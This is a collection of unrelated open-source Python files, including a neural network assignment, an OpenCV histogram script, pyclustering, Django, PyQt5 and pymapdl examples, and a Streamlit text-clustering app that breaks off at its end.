Returns a tuple (out, cache)
- out: output of the same shape as x
- cache: identical to out; required for backpropagation
"""
return sigmoid(x), sigmoid(x)
def sigmoid_backward(dout, cache):
"""
Computes the backward pass for an sigmoid layer.
Inputs:
- dout: Upstream derivative, same shape as the input
to the sigmoid layer (x)
- cache: sigmoid(x)
Returns a tuple of:
- dx: back propagated gradient with respect to x
"""
x = cache
return sigmoid_grad(x) * dout
def forward_backward_prop(data, labels, params, dimensions):
"""
Forward and backward propagation for a two-layer sigmoidal network
Compute the forward propagation and for the cross entropy cost,
and backward propagation for the gradients for all parameters.
"""
### Unpack network parameters (do not modify)
ofs = 0
Dx, H, Dy = (dimensions[0], dimensions[1], dimensions[2])
N = data.shape[0]
W1 = np.reshape(params[ofs:ofs+ Dx * H], (Dx, H))
ofs += Dx * H
b1 = np.reshape(params[ofs:ofs + H], (1, H))
ofs += H
W2 = np.reshape(params[ofs:ofs + H * Dy], (H, Dy))
ofs += H * Dy
b2 = np.reshape(params[ofs:ofs + Dy], (1, Dy))
### YOUR CODE HERE: forward propagation
hidden = np.dot(data,W1) + b1
layer1_a = sigmoid(hidden)
layer2 = np.dot(layer1_a, W2) + b2
# need to calculate the softmax loss
probs = softmax(layer2)
cost = - np.sum(np.log(probs[np.arange(N), np.argmax(labels, axis=1)]))
### END YOUR CODE
### YOUR CODE HERE: backward propagation
#There is no regularization :/
# dx -> sigmoid -> W2 * layer1_a + b -> sigmoid -> W1 * data + b1 -> ..
dx = probs.copy()
dx -= labels
dlayer2 = np.zeros_like(dx)
gradW2 = np.zeros_like(W2)
gradW1 = np.zeros_like(W1)
gradb2 = np.zeros_like(b2)
gradb1 = np.zeros_like(b1)
gradW2 = np.dot(layer1_a.T, dx)
gradb2 = np.sum(dx, axis=0)
dlayer2 = np.dot(dx, W2.T)
dlayer1 = sigmoid_grad(layer1_a) * dlayer2
gradW1 = np.dot(data.T, dlayer1)
gradb1 = np.sum(dlayer1, axis=0)
# Decided to implement affine (forward and backward function)
# sigmoid (forward and backward function)
# These should work properly;
# scores, cache_1 = affine_forward(data, W1, b1)
# scores, cache_s1 = sigmoid_forward(scores)
# scores, cache_2 = affine_forward(scores, W2, b2)
# # need to calculate the softmax loss
# probs = softmax(scores)
# cost = -np.sum(np.log(probs[np.arange(N), np.argmax(labels)] + 1e-12)) / N
# softmax_dx = probs.copy()
# softmax_dx[np.arange(N), np.argmax(labels,axis=1)] -= 1
# softmax_dx /= N
# grads = {}
# dlayer2, grads['W2'], grads['b2'] = affine_backward(softmax_dx, cache_2)
# dlayer1s = sigmoid_backward(dlayer2, cache_s1)
# dlayer1, grads['W1'], grads['b1'] = affine_backward(dlayer1s, cache_1)
#softmax_dx is the gradient of the loss w.r.t. y_{est}
### END YOUR CODE
### Stack gradients (do not modify)
grad = np.concatenate((gradW1.flatten(), gradb1.flatten(),
gradW2.flatten(), gradb2.flatten()))
return cost, grad
def sanity_check():
"""
Set up fake data and parameters for the neural network, and test using
gradcheck.
"""
print("Running sanity check...")
N = 300
dimensions = [10, 5, 10]
data = np.random.randn(N, dimensions[0]) # each row will be a datum
labels = np.zeros((N, dimensions[2]))
for i in range(N):
labels[i,random.randint(0,dimensions[2]-1)] = 1
params = np.random.randn((dimensions[0] + 1) * dimensions[1] + (
dimensions[1] + 1) * dimensions[2], )
#cost, _ = forward_backward_prop(data, labels, params, dimensions)
# # expect to get 1 in 10 correct
#print(np.exp(-cost))
# #cost is roughly correct
gradcheck_naive(lambda params: forward_backward_prop(data, labels, params,
dimensions), params)
def your_sanity_checks():
"""
Use this space add any additional sanity checks by running:
python q2_neural.py
This function will not be called by the autograder, nor will
your additional tests be graded.
"""
print("Running your sanity checks...")
### YOUR CODE HERE
#raise NotImplementedError
### END YOUR CODE
if __name__ == "__main__":
sanity_check()
your_sanity_checks()
|
ch22-直方图/hist-normalized-numpy-2.py | makelove/OpenCV-Python-Tutorial | 2,875 | 12770889 | <filename>ch22-直方图/hist-normalized-numpy-2.py
# -*-coding:utf8-*-#
__author__ = 'play4fun'
"""
create time: 15-10-24 5:26 PM
"""
import cv2
import numpy as np
from matplotlib import pyplot as plt
img = cv2.imread('../data/contrast75.png', 0)
# flatten() turns the array into a 1-D array
hist, bins = np.histogram(img.flatten(), 256, [0, 256])
# compute the cumulative distribution function (CDF)
cdf = hist.cumsum()
##
# Build a NumPy masked array from the CDF: elements equal to 0 are masked (ignored in the calculation)
cdf_m = np.ma.masked_equal(cdf, 0)
cdf_m = (cdf_m - cdf_m.min()) * 255 / (cdf_m.max() - cdf_m.min())
# fill the masked elements with 0
cdf = np.ma.filled(cdf_m, 0).astype('uint8')
img2 = cdf[img]
# cv2.imshow("img2",img2)
# cv2.waitKey(0)
##
# flatten() turns the array into a 1-D array
hist, bins = np.histogram(img2.flatten(), 256, [0, 256])
# compute the cumulative distribution function (CDF)
cdf = hist.cumsum()
cdf_normalized = cdf * hist.max() / cdf.max()
plt.plot(cdf_normalized, color='b')
plt.hist(img.flatten(), 256, [0, 256], color='r')
plt.xlim([0, 256])
plt.legend(('cdf', 'histogram'), loc='upper left')
plt.show()
'''
Histogram equalization is often used as a reference tool to give all images the same brightness conditions. This is useful in many situations, for example face recognition: before training a classifier, histogram-equalize all of the training images first so that they reach the same brightness conditions.
''' |
pyclustering/nnet/__init__.py | JosephChataignon/pyclustering | 1,013 | 12770963 | <reponame>JosephChataignon/pyclustering<gh_stars>1000+
"""!
@brief Neural and oscillatory network module. Consists of models of bio-inspired networks.
@authors <NAME> (<EMAIL>)
@date 2014-2020
@copyright BSD-3-Clause
"""
import math
from enum import IntEnum
class initial_type(IntEnum):
"""!
@brief Enumerator of types of oscillator output initialization.
"""
## Output of oscillators are random in line with gaussian distribution.
RANDOM_GAUSSIAN = 0
## Output of oscillators are equidistant from each other (uniformly distributed, not randomly).
EQUIPARTITION = 1
class solve_type(IntEnum):
"""!
@brief Enumerator of solver types that are used for network simulation.
"""
## Forward Euler first-order method.
FAST = 0 # Usual calculation: x(k + 1) = x(k) + f(x(k)).
## Classic fourth-order Runge-Kutta method (fixed step).
RK4 = 1
## Runge-Kutta-Fehlberg method with order 4 and 5 (float step)."
RKF45 = 2
class conn_type(IntEnum):
"""!
@brief Enumerator of connection types between oscillators.
"""
## No connection between oscillators.
NONE = 0
## All oscillators have connection with each other.
ALL_TO_ALL = 1
## Connections between oscillators represent grid where one oscillator can be connected with four neighbor oscillators: right, upper, left, lower.
GRID_FOUR = 2
## Connections between oscillators represent grid where one oscillator can be connected with eight neighbor oscillators: right, right-upper, upper, upper-left, left, left-lower, lower, lower-right.
GRID_EIGHT = 3
## Connections between oscillators represent bidirectional list.
LIST_BIDIR = 4
## Connections are defined by user or by network during simulation.
DYNAMIC = 5
class conn_represent(IntEnum):
"""!
@brief Enumerator of internal network connection representation between oscillators.
"""
## Each oscillator has list of his neighbors.
LIST = 0
## Connections are represented my matrix connection NxN, where N is number of oscillators.
MATRIX = 1
class network:
"""!
    @brief   Common network description that consists of information about oscillators and connections between them.
"""
_num_osc = 0
_osc_conn = None
_conn_represent = None
__conn_type = None
__height = 0
__width = 0
@property
def height(self):
"""!
        @brief Height of the network grid (that is defined by the amount of oscillators in each column); this value is zero in case of non-grid structure.
@note This property returns valid value only for network with grid structure.
"""
return self.__height
@property
def width(self):
"""!
@brief Width of the network grid, this value is zero in case of non-grid structure.
@note This property returns valid value only for network with grid structure.
"""
return self.__width
@property
def structure(self):
"""!
@brief Type of network structure that is used for connecting oscillators.
"""
return self.__conn_type
def __init__(self, num_osc, type_conn = conn_type.ALL_TO_ALL, conn_repr = conn_represent.MATRIX, height = None, width = None):
"""!
@brief Constructor of the network.
@param[in] num_osc (uint): Number of oscillators in the network that defines size of the network.
@param[in] type_conn (conn_type): Type of connections that are used in the network between oscillators.
@param[in] conn_repr (conn_represent): Type of representation of connections.
@param[in] height (uint): Number of oscillators in column of the network, this argument is used
only for network with grid structure (GRID_FOUR, GRID_EIGHT), for other types this argument is ignored.
        @param[in] width (uint): Number of oscillators in row of the network, this argument is used only
for network with grid structure (GRID_FOUR, GRID_EIGHT), for other types this argument is ignored.
"""
self._num_osc = num_osc
self._conn_represent = conn_repr
self.__conn_type = type_conn
if conn_repr is None:
self._conn_represent = conn_represent.MATRIX
if (type_conn == conn_type.GRID_EIGHT) or (type_conn == conn_type.GRID_FOUR):
if (height is not None) and (width is not None):
self.__height = height
self.__width = width
else:
side_size = self._num_osc ** 0.5
if (side_size - math.floor(side_size) > 0):
raise NameError("Invalid number of oscillators '" + str(num_osc) + "' in the network in case of grid structure (root square should be extractable for the number of oscillators).");
self.__height = int(side_size)
self.__width = self.__height
if self.__height * self.__width != self._num_osc:
raise NameError('Width (' + str(self.__width) + ') x Height (' + str(self.__height) + ') must be equal to Size (' + str(self._num_osc) + ') in case of grid structure');
self._create_structure(type_conn)
def __len__(self):
"""!
@brief Returns size of the network that is defined by amount of oscillators.
"""
return self._num_osc;
def __create_connection(self, index1, index2):
if (self._conn_represent == conn_represent.MATRIX):
self._osc_conn[index1][index2] = True;
else:
self._osc_conn[index1].append(index2);
def __create_all_to_all_connections(self):
"""!
@brief Creates connections between all oscillators.
"""
if (self._conn_represent == conn_represent.MATRIX):
for index in range(0, self._num_osc, 1):
self._osc_conn.append([True] * self._num_osc);
self._osc_conn[index][index] = False;
elif (self._conn_represent == conn_represent.LIST):
for index in range(0, self._num_osc, 1):
self._osc_conn.append([neigh for neigh in range(0, self._num_osc, 1) if index != neigh]);
def __create_grid_four_connections(self):
"""!
@brief Creates network with connections that make up four grid structure.
@details Each oscillator may be connected with four neighbors in line with 'grid' structure: right, upper, left, lower.
"""
side_size = self.__width;
if (self._conn_represent == conn_represent.MATRIX):
self._osc_conn = [[0] * self._num_osc for index in range(0, self._num_osc, 1)];
elif (self._conn_represent == conn_represent.LIST):
self._osc_conn = [[] for index in range(0, self._num_osc, 1)];
else:
raise NameError("Unknown type of representation of connections");
for index in range(0, self._num_osc, 1):
upper_index = index - side_size;
lower_index = index + side_size;
left_index = index - 1;
right_index = index + 1;
node_row_index = math.ceil(index / side_size);
if (upper_index >= 0):
self.__create_connection(index, upper_index);
if (lower_index < self._num_osc):
self.__create_connection(index, lower_index);
if ( (left_index >= 0) and (math.ceil(left_index / side_size) == node_row_index) ):
self.__create_connection(index, left_index);
if ( (right_index < self._num_osc) and (math.ceil(right_index / side_size) == node_row_index) ):
self.__create_connection(index, right_index);
def __create_grid_eight_connections(self):
"""!
@brief Creates network with connections that make up eight grid structure.
@details Each oscillator may be connected with eight neighbors in line with grid structure: right, right-upper, upper, upper-left, left, left-lower, lower, lower-right.
"""
self.__create_grid_four_connections(); # create connection with right, upper, left, lower.
side_size = self.__width;
for index in range(0, self._num_osc, 1):
upper_left_index = index - side_size - 1;
upper_right_index = index - side_size + 1;
lower_left_index = index + side_size - 1;
lower_right_index = index + side_size + 1;
node_row_index = math.floor(index / side_size);
upper_row_index = node_row_index - 1;
lower_row_index = node_row_index + 1;
if ( (upper_left_index >= 0) and (math.floor(upper_left_index / side_size) == upper_row_index) ):
self.__create_connection(index, upper_left_index);
if ( (upper_right_index >= 0) and (math.floor(upper_right_index / side_size) == upper_row_index) ):
self.__create_connection(index, upper_right_index);
if ( (lower_left_index < self._num_osc) and (math.floor(lower_left_index / side_size) == lower_row_index) ):
self.__create_connection(index, lower_left_index);
if ( (lower_right_index < self._num_osc) and (math.floor(lower_right_index / side_size) == lower_row_index) ):
self.__create_connection(index, lower_right_index);
def __create_list_bidir_connections(self):
"""!
@brief Creates network as bidirectional list.
        @details Each oscillator may be connected with two neighbors in line with classical list structure: right, left.
"""
if (self._conn_represent == conn_represent.MATRIX):
for index in range(0, self._num_osc, 1):
self._osc_conn.append([0] * self._num_osc);
self._osc_conn[index][index] = False;
if (index > 0):
self._osc_conn[index][index - 1] = True;
if (index < (self._num_osc - 1)):
self._osc_conn[index][index + 1] = True;
elif (self._conn_represent == conn_represent.LIST):
for index in range(self._num_osc):
self._osc_conn.append([]);
if (index > 0):
self._osc_conn[index].append(index - 1);
if (index < (self._num_osc - 1)):
self._osc_conn[index].append(index + 1);
def __create_none_connections(self):
"""!
@brief Creates network without connections.
"""
if (self._conn_represent == conn_represent.MATRIX):
for _ in range(0, self._num_osc, 1):
self._osc_conn.append([False] * self._num_osc);
elif (self._conn_represent == conn_represent.LIST):
self._osc_conn = [[] for _ in range(0, self._num_osc, 1)];
def __create_dynamic_connection(self):
"""!
@brief Prepare storage for dynamic connections.
"""
if (self._conn_represent == conn_represent.MATRIX):
for _ in range(0, self._num_osc, 1):
self._osc_conn.append([False] * self._num_osc);
elif (self._conn_represent == conn_represent.LIST):
self._osc_conn = [[] for _ in range(0, self._num_osc, 1)];
def _create_structure(self, type_conn = conn_type.ALL_TO_ALL):
"""!
        @brief Creates connections in line with the representation of matrix connections [NumOsc x NumOsc].
@param[in] type_conn (conn_type): Connection type (all-to-all, bidirectional list, grid structure, etc.) that is used by the network.
"""
self._osc_conn = list();
if (type_conn == conn_type.NONE):
self.__create_none_connections();
elif (type_conn == conn_type.ALL_TO_ALL):
self.__create_all_to_all_connections();
elif (type_conn == conn_type.GRID_FOUR):
self.__create_grid_four_connections();
elif (type_conn == conn_type.GRID_EIGHT):
self.__create_grid_eight_connections();
elif (type_conn == conn_type.LIST_BIDIR):
self.__create_list_bidir_connections();
elif (type_conn == conn_type.DYNAMIC):
self.__create_dynamic_connection();
else:
raise NameError('The unknown type of connections');
def has_connection(self, i, j):
"""!
        @brief Returns True if there is a connection between oscillators i and j, and False if the connection doesn't exist.
@param[in] i (uint): index of an oscillator in the network.
@param[in] j (uint): index of an oscillator in the network.
"""
if (self._conn_represent == conn_represent.MATRIX):
return (self._osc_conn[i][j]);
elif (self._conn_represent == conn_represent.LIST):
for neigh_index in range(0, len(self._osc_conn[i]), 1):
if (self._osc_conn[i][neigh_index] == j):
return True;
return False;
else:
raise NameError("Unknown type of representation of coupling");
def set_connection(self, i, j):
"""!
@brief Couples two specified oscillators in the network with dynamic connections.
@param[in] i (uint): index of an oscillator that should be coupled with oscillator 'j' in the network.
@param[in] j (uint): index of an oscillator that should be coupled with oscillator 'i' in the network.
        @note This method can be used only in case of DYNAMIC connections, otherwise it throws an exception.
"""
if (self.structure != conn_type.DYNAMIC):
raise NameError("Connection between oscillators can be changed only in case of dynamic type.");
if (self._conn_represent == conn_represent.MATRIX):
self._osc_conn[i][j] = True;
self._osc_conn[j][i] = True;
else:
self._osc_conn[i].append(j);
self._osc_conn[j].append(i);
def get_neighbors(self, index):
"""!
@brief Finds neighbors of the oscillator with specified index.
@param[in] index (uint): index of oscillator for which neighbors should be found in the network.
@return (list) Indexes of neighbors of the specified oscillator.
"""
if (self._conn_represent == conn_represent.LIST):
return self._osc_conn[index]; # connections are represented by list.
elif (self._conn_represent == conn_represent.MATRIX):
return [neigh_index for neigh_index in range(self._num_osc) if self._osc_conn[index][neigh_index] == True];
else:
raise NameError("Unknown type of representation of connections");
|
leonardo/module/web/widgets/tables.py | timgates42/django-leonardo | 102 | 12770980 |
import floppyforms as forms
from django.forms.models import modelformset_factory
from django.utils.translation import ugettext_lazy as _
from horizon import tables
from horizon.tables.formset import FormsetDataTable, FormsetRow
from leonardo.module.web.models import WidgetDimension
class Slider(forms.RangeInput):
min = 1
max = 12
step = 1
template_name = 'floppyforms/slider.html'
class OffsetSlider(Slider):
min = 0
class HeightSlider(OffsetSlider):
max = 24
class WidgetDimensionForm(forms.ModelForm):
width = forms.CharField(widget=Slider(), initial=12)
height = forms.CharField(widget=HeightSlider(), initial=0)
offset = forms.CharField(widget=OffsetSlider(), initial=0)
def __init__(self, *args, **kw):
super(WidgetDimensionForm, self).__init__(*args, **kw)
self.fields['size'].initial = 'xs'
class Meta:
model = WidgetDimension
exclude = tuple()
WidgetDimensionFormset = modelformset_factory(
WidgetDimension, form=WidgetDimensionForm, can_delete=True, extra=1)
class CustomFormsetRow(FormsetRow):
def __init__(self, column, datum, form):
self.form = form
super(CustomFormsetRow, self).__init__(column, datum, form)
# add initial
if not datum and column.data:
try:
previous = column.data[0]
self.form.fields['widget_type'].initial = previous.widget_type
self.form.fields['widget_id'].initial = previous.widget_id
self.form.fields['id'].initial = previous.id + 1
except Exception:
pass
class WidgetDimensionTable(FormsetDataTable):
formset_class = WidgetDimensionFormset
def get_formset(self):
"""Provide the formset corresponding to this DataTable.
Use this to validate the formset and to get the submitted data back.
"""
if self.widget:
queryset = self.widget.dimensions
else:
queryset = WidgetDimension.objects.none()
if self._formset is None:
self._formset = self.formset_class(
self.request.POST or None,
initial=self._get_formset_data(),
prefix=self._meta.name,
queryset=queryset)
return self._formset
def __init__(self, *args, **kwargs):
self._meta.row_class = CustomFormsetRow
self.widget = kwargs.pop('widget', None)
super(WidgetDimensionTable, self).__init__(*args, **kwargs)
widget_id = tables.Column('widget_id', hidden=True)
widget_type = tables.Column('widget_type', hidden=True)
size = tables.Column('size', verbose_name=_('Size'))
    width = tables.Column('width', verbose_name=_('Width'))
height = tables.Column('height', verbose_name=_('Height'))
offset = tables.Column('offset', verbose_name=_('Offset'))
name = 'dimensions'
class Meta:
name = 'dimensions'
table_name = 'Dimensions'
|
qt__pyqt__pyside__pyqode/pyqt5__QComboBox.py | DazEB2/SimplePyScripts | 117 | 12771000 | <reponame>DazEB2/SimplePyScripts<filename>qt__pyqt__pyside__pyqode/pyqt5__QComboBox.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from PyQt5.Qt import *
class MainWindow(QWidget):
def __init__(self):
super().__init__()
self.tb_result = QTextBrowser()
self.cb_pets = QComboBox()
self.cb_pets.currentIndexChanged.connect(self._on_pet_changed)
self.cb_pets.addItem('Собаки', userData='dogs')
self.cb_pets.addItem('Коты', userData='cats')
layout = QVBoxLayout()
layout.addWidget(self.cb_pets)
layout.addWidget(self.tb_result)
self.setLayout(layout)
def _on_pet_changed(self, index):
# print(index) # 0
# print(self.cb_pets.itemText(index)) # Собаки
# print(self.cb_pets.itemData(index)) # dogs
# print()
# print(self.cb_pets.currentIndex()) # 0
# print(self.cb_pets.currentText()) # Собаки
# print(self.cb_pets.currentData()) # dogs
data = self.cb_pets.itemData(index)
if data == 'cats':
text = "Вы любите кошек"
elif data == 'dogs':
text = "Вы любите собак"
else:
text = ''
self.tb_result.setHtml(text)
if __name__ == '__main__':
app = QApplication([])
mw = MainWindow()
mw.show()
app.exec()
|
mne/viz/tests/test_figure.py | stevemats/mne-python | 1,953 | 12771029 | # Authors: <NAME> <<EMAIL>>
#
# License: Simplified BSD
import pytest
from mne.viz._mpl_figure import _psd_figure
from mne.viz._figure import _get_browser
def test_browse_figure_constructor():
"""Test error handling in MNEBrowseFigure constructor."""
with pytest.raises(TypeError, match='an instance of Raw, Epochs, or ICA'):
_get_browser(inst='foo')
def test_psd_figure_constructor():
"""Test error handling in MNELineFigure constructor."""
with pytest.raises(TypeError, match='an instance of Raw or Epochs, got'):
_psd_figure('foo', *((None,) * 20))
|
alphamind/benchmarks/data/winsorize.py | rongliang-tech/alpha-mind | 186 | 12771041 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
"""
Created on 2017-4-25
@author: cheng.li
"""
import datetime as dt
import numpy as np
import pandas as pd
from alphamind.data.winsorize import winsorize_normal
def benchmark_winsorize_normal(n_samples: int, n_features: int, n_loops: int) -> None:
print("-" * 60)
print("Starting winsorize normal benchmarking")
print("Parameters(n_samples: {0}, n_features: {1}, n_loops: {2})".format(n_samples, n_features,
n_loops))
num_stds = 2
x = np.random.randn(n_samples, n_features)
start = dt.datetime.now()
for _ in range(n_loops):
_ = winsorize_normal(x, num_stds)
impl_model_time = dt.datetime.now() - start
print('{0:20s}: {1}'.format('Implemented model', impl_model_time))
def impl(x):
std_values = x.std(axis=0)
mean_value = x.mean(axis=0)
lower_bound = mean_value - num_stds * std_values
upper_bound = mean_value + num_stds * std_values
res = np.where(x > upper_bound, upper_bound, x)
res = np.where(res < lower_bound, lower_bound, res)
return res
start = dt.datetime.now()
for _ in range(n_loops):
_ = impl(x)
benchmark_model_time = dt.datetime.now() - start
print('{0:20s}: {1}'.format('Benchmark model', benchmark_model_time))
def benchmark_winsorize_normal_with_group(n_samples: int, n_features: int, n_loops: int,
n_groups: int) -> None:
print("-" * 60)
print("Starting winsorize normal with group-by values benchmarking")
print(
"Parameters(n_samples: {0}, n_features: {1}, n_loops: {2}, n_groups: {3})".format(n_samples,
n_features,
n_loops,
n_groups))
num_stds = 2
x = np.random.randn(n_samples, n_features)
groups = np.random.randint(n_groups, size=n_samples)
start = dt.datetime.now()
for _ in range(n_loops):
_ = winsorize_normal(x, num_stds, groups=groups)
impl_model_time = dt.datetime.now() - start
print('{0:20s}: {1}'.format('Implemented model', impl_model_time))
def impl(x):
std_values = x.std(axis=0)
mean_value = x.mean(axis=0)
lower_bound = mean_value - num_stds * std_values
upper_bound = mean_value + num_stds * std_values
res = np.where(x > upper_bound, upper_bound, x)
res = np.where(res < lower_bound, lower_bound, res)
return res
start = dt.datetime.now()
for _ in range(n_loops):
_ = pd.DataFrame(x).groupby(groups).transform(impl)
benchmark_model_time = dt.datetime.now() - start
print('{0:20s}: {1}'.format('Benchmark model', benchmark_model_time))
if __name__ == '__main__':
benchmark_winsorize_normal(3000, 10, 1000)
benchmark_winsorize_normal_with_group(3000, 10, 1000, 30)
|
examples/00-mapdl-examples/contact_elements.py | RGPATCHI/pymapdl | 194 | 12771047 | """
.. _ref_contact_example:
Contact Element Example
~~~~~~~~~~~~~~~~~~~~~~~
This example demonstrates how to create contact elements for general
contact.
Begin by launching MAPDL.
"""
from ansys.mapdl import core as pymapdl
mapdl = pymapdl.launch_mapdl()
###############################################################################
# Enter the pre-processor, create a block and mesh it with tetrahedral
# elements.
#
mapdl.prep7()
vnum0 = mapdl.block(0, 1, 0, 1, 0, 0.5)
mapdl.et(1, 187)
mapdl.esize(0.1)
mapdl.vmesh(vnum0)
mapdl.eplot()
###############################################################################
# Create a second volume block above the existing block and mesh it with
# quadratic hexahedral elements. Ensure that these blocks do not
# touch by starting it slightly higher than the existing block.
#
# Note how these two blocks do not touch and the mesh is non-conformal.
mapdl.esize(0.09)
mapdl.et(2, 186)
mapdl.type(2)
vnum1 = mapdl.block(0, 1, 0, 1, 0.50001, 1)
mapdl.vmesh(vnum1)
mapdl.eplot()
###############################################################################
# Select all the elements at the intersection between the two blocks
# and generate contact elements.
mapdl.nsel("s", "loc", "z", 0.5, 0.50001)
mapdl.esln("s")
output = mapdl.gcgen("NEW", splitkey="SPLIT", selopt="SELECT")
print(output)
###############################################################################
# Plot the contact element pairs. Note from the command output above
# that the section IDs are 5 and 6.
#
# Here, we plot the element mesh as a wire-frame to show that the
# contact pairs overlap.
mapdl.esel("S", "SEC", vmin=5, vmax=6)
mapdl.eplot(style="wireframe", line_width=3)
|
snapchat_problems/problem_5.py | loftwah/Daily-Coding-Problem | 129 | 12771078 | <filename>snapchat_problems/problem_5.py
"""This problem was asked by Snapchat.
You are given an array of length N, where each element i represents the number of ways
we can produce i units of change. For example, [1, 0, 1, 1, 2] would indicate that
there is only one way to make 0, 2, or 3 units, and two ways of making 4 units.
Given such an array, determine the denominations that must be in use.
In the case above, for example, there must be coins with value 2, 3, and 4.
""" |
pyringe/plugins/mod_base.py | Freezind/pyringe | 507 | 12771087 | #! /usr/bin/env python
#
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Provides basic testing modes for the remote debugger."""
import abc
class DebuggingPlugin(object):
"""Superclass for all debugging plugins."""
__metaclass__ = abc.ABCMeta
def __init__(self, inferior, name):
self.name = name
self.position = None
self.inferior = inferior
super(DebuggingPlugin, self).__init__()
@abc.abstractproperty
def commands(self):
return []
|
AutoDL_sample_code_submission/at_toolkit/interface/adl_classifier.py | dianjixz/AutoDL | 1,044 | 12771103 | <reponame>dianjixz/AutoDL
import numpy as np
class AdlClassifier(object):
def init(self, class_num: int, init_params: dict):
self.class_num = class_num
self.label_map = list()
self.clf_name = None
raise NotImplementedError
def fit(self, train_examples_x: np.ndarray, train_examples_y: np.ndarray, fit_params:dict):
raise NotImplementedError
def predict_proba(self, test_examples: np.ndarray, predict_prob_params: dict) -> np.ndarray:
raise NotImplementedError
def rebuild_prob_res(self, input_label_list, orig_prob_array):
new_prob_arary = np.zeros((orig_prob_array.shape[0], self.class_num))
for i, cls in enumerate(input_label_list):
new_prob_arary[:, cls] = orig_prob_array[:, i]
empty_cls_list = list()
for i in range(self.class_num):
if i not in input_label_list:
empty_cls_list.append(i)
for sample_i in range(orig_prob_array.shape[0]):
np_median_value = np.median(new_prob_arary[sample_i])
for empty_cls in empty_cls_list:
new_prob_arary[sample_i][empty_cls] = np_median_value
return new_prob_arary
class AdlOfflineClassifier(AdlClassifier):
def offline_fit(self, train_examples_x: np.ndarray, train_examples_y: np.ndarray, fit_params:dict):
raise NotImplementedError
class AdlOnlineClassifier(AdlClassifier):
def online_fit(self, train_examples_x: np.ndarray, train_examples_y: np.ndarray, fit_params:dict):
raise NotImplementedError
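# Illustrative usage sketch (added; not part of the original file). It shows how
# rebuild_prob_res maps probabilities predicted over a label subset back onto
# the full class space, filling unseen classes with each sample's median value.
# The tiny subclass below exists only to make the abstract base usable here.
class _DemoAdlClassifier(AdlClassifier):
    def init(self, class_num, init_params):
        self.class_num = class_num
        self.label_map = list()
        self.clf_name = "demo"
if __name__ == "__main__":
    demo = _DemoAdlClassifier()
    demo.init(class_num=4, init_params={})
    partial = np.array([[0.9, 0.1], [0.3, 0.7]])  # probabilities for classes 0 and 2 only
    print(demo.rebuild_prob_res([0, 2], partial))  # rebuilt to shape (2, 4)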
|
rasalit/apps/nlucluster/app.py | omidforoqi/rasalit | 261 | 12771105 | <reponame>omidforoqi/rasalit<gh_stars>100-1000
import os
import pathlib
from io import StringIO
from pkg_resources import resource_filename
import streamlit as st
from whatlies.language import CountVectorLanguage
from whatlies.transformers import Pca, Umap
from whatlies import EmbeddingSet, Embedding
import sentencepiece as spm
import tensorflow as tf
import tensorflow_hub as hub
import tensorflow.compat.v1 as tf # noqa: F811
tf.disable_v2_behavior()
with tf.Session() as sess:
module = hub.Module("https://tfhub.dev/google/universal-sentence-encoder-lite/1")
spm_path = sess.run(module(signature="spm_path"))
sp = spm.SentencePieceProcessor()
sp.Load(spm_path)
input_placeholder = tf.sparse_placeholder(tf.int64, shape=[None, None])
encodings = module(
inputs=dict(
values=input_placeholder.values,
indices=input_placeholder.indices,
dense_shape=input_placeholder.dense_shape,
)
)
def process_to_IDs_in_sparse_format(sp, sentences):
ids = [sp.EncodeAsIds(x) for x in sentences]
max_len = max(len(x) for x in ids)
dense_shape = (len(ids), max_len)
values = [item for sublist in ids for item in sublist]
indices = [[row, col] for row in range(len(ids)) for col in range(len(ids[row]))]
return values, indices, dense_shape
def calculate_embeddings(messages, encodings):
values, indices, dense_shape = process_to_IDs_in_sparse_format(sp, messages)
with tf.Session() as session:
session.run([tf.global_variables_initializer(), tf.tables_initializer()])
message_embeddings = session.run(
encodings,
feed_dict={
input_placeholder.values: values,
input_placeholder.indices: indices,
input_placeholder.dense_shape: dense_shape,
},
)
return message_embeddings
st.sidebar.markdown("Made with love over at [Rasa](https://rasa.com/).")
uploaded = st.sidebar.file_uploader(
"Upload a `.txt` file for clustering. Each utterance should appear on a new line."
)
if not uploaded:
filepath = resource_filename("rasalit", os.path.join("data", "nlu.md"))
txt = pathlib.Path(filepath).read_text()
texts = list(set([t for t in txt.split("\n") if len(t) > 0]))
else:
bytes_data = uploaded.read()
stringio = StringIO(bytes_data.decode("utf-8"))
string_data = stringio.read()
texts = [
t.replace(" - ", "")
for t in string_data.split("\n")
if len(t) > 0 and t[0] != "#"
]
method = st.sidebar.selectbox(
"Select Embedding Method", ["Lite Sentence Encoding", "CountVector SVD"]
)
if method == "CountVector SVD":
n_svd = st.sidebar.slider(
"Number of SVD components", min_value=2, max_value=100, step=1
)
min_ngram, max_ngram = st.sidebar.slider(
"Range of ngrams", min_value=1, max_value=5, step=1, value=(2, 3)
)
reduction_method = st.sidebar.selectbox("Reduction Method", ("Umap", "Pca"))
if reduction_method == "Umap":
n_neighbors = st.sidebar.slider(
"Number of UMAP neighbors", min_value=1, max_value=100, value=15, step=1
)
min_dist = st.sidebar.slider(
"Minimum Distance for UMAP",
min_value=0.01,
max_value=0.99,
value=0.8,
step=0.01,
)
reduction = Umap(2, n_neighbors=n_neighbors, min_dist=min_dist)
else:
reduction = Pca(2)
st.markdown("# Simple Text Clustering")
st.markdown(
"Let's say you've gotten a lot of feedback from clients on different channels. You might like to be able to distill main topics and get an overview. It might even inspire some intents that will be used in a virtual assistant!"
)
st.markdown(
"This tool will help you discover them. This app will attempt to cluster whatever text you give it. The chart will try to clump text together and you can explore underlying patterns."
)
if method == "CountVector SVD":
lang = CountVectorLanguage(n_svd, ngram_range=(min_ngram, max_ngram))
embset = lang[texts]
if method == "Lite Sentence Encoding":
embset = EmbeddingSet(
*[
Embedding(t, v)
for t, v in zip(texts, calculate_embeddings(texts, encodings=encodings))
]
)
p = (
embset.transform(reduction)
.plot_interactive(annot=False)
.properties(width=500, height=500, title="")
)
st.write(p)
st.markdown(
